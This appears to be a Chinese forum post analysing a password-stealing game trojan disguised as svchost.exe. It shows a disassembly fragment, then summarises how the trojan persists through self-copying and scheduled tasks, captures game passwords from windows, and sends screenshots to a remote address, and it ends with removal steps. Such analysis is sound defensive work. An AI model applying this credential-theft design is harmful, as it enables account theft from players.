00411B8A . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
00411B90 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00411B93 . 53 push ebx
00411B94 . 68 3C5C4000 push svchost.00405C3C ; hwnd
00411B99 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
00411B9C . 50 push eax
00411B9D . 51 push ecx
00411B9E . FFD7 call edi
00411BA0 . 83C4 10 add esp,10
00411BA3 . 8D55 C4 lea edx,dword ptr ss:[ebp-3C]
00411BA6 . 68 4C5C4000 push svchost.00405C4C ; Internet Explorer_Server
00411BAB . 52 push edx
00411BAC . FF15 C0F14100 call dword ptr ds:[<&msvbvm60.__vbaI4V>; msvbvm60.__vbaI4Var
00411BB2 . 50 push eax
00411BB3 . E8 E8030000 call svchost.00411FA0
00411BB8 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
00411BBB . 8945 E8 mov dword ptr ss:[ebp-18],eax
00411BBE . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
00411BC4 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00411BC7 . 53 push ebx
00411BC8 . 68 9C5C4000 push svchost.00405C9C ; focus
00411BCD . 53 push ebx
00411BCE . 68 885C4000 push svchost.00405C88 ; fileField
00411BD3 . 53 push ebx
00411BD4 . 68 805C4000 push svchost.00405C80 ; All
00411BD9 . 53 push ebx
00411BDA . 68 1C5C4000 push svchost.00405C1C ; Document
总结:
1.获取制定目录创建目录,自复制,然后运行。
2.创建bat实现计划任务指定时间运行木马。
3.结束自身。
4.复制后的程序通过查找窗口,枚举进程方法获取游戏窗口截取密码。
5.至于密保就是利用截屏,然后发送到制定地址。
由于本人能力的有限,错误及遗漏在所难免! 或许原理并没有这么简单,还请其他高手作出指点. 万分感谢!
查杀方法:
首先用XueTr.exe 结束svchost.exe结束进程(不结束怎么删除哈),然后
到这个目录删除C:\WINDOWS\system32\Pusmint下所有的文件。
然后运行XueTr.exe切换到启动项就明朗了,直接delete *.JOB的项目。
|
免费评分
-
查看全部评分
|